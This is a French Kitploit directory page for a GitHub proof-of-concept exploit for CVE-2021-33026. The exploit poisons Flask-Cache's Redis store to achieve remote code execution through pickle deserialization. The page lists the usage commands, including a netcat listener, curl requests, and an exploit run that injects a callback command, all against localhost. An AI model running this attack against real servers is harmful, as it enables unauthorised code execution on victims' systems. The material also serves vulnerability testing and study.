Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FlaskCache_CVE-2021-33026_POC — Exploit PoC pour CVE-2021-33026 qui empoisonne le cache Redis dans Flask-Cache pour réaliser une exécution de code à distance via une désérialisation pickle malveillante. | Kitploit
Outils/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubagilevatester/flaskcache_cve-2021-33026_poc

FlaskCache_CVE-2021-33026_POC

Exploit PoC pour CVE-2021-33026 qui empoisonne le cache Redis dans Flask-Cache pour réaliser une exécution de code à distance via une désérialisation pickle malveillante.

Voir le dépôt
12il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit


Vérifier que le serveur Redis est en ligne

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


Démarrer l'écoute netcat sur le port 10001 :

nc -nvlp 10001


Configuration de l'environnement pour Flask Cache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Configuration de l'environnement pour Flask Cache 2.3.0

Exécuter l'application Flask et créer une clé de cache :

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Récupérer la valeur de la clé de cache depuis l'application Flask

curl --request GET http://localhost:5000/cache/[key]

Exploitation de Flask Cache en empoisonnant le cache Redis :

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

Télécharger l’outil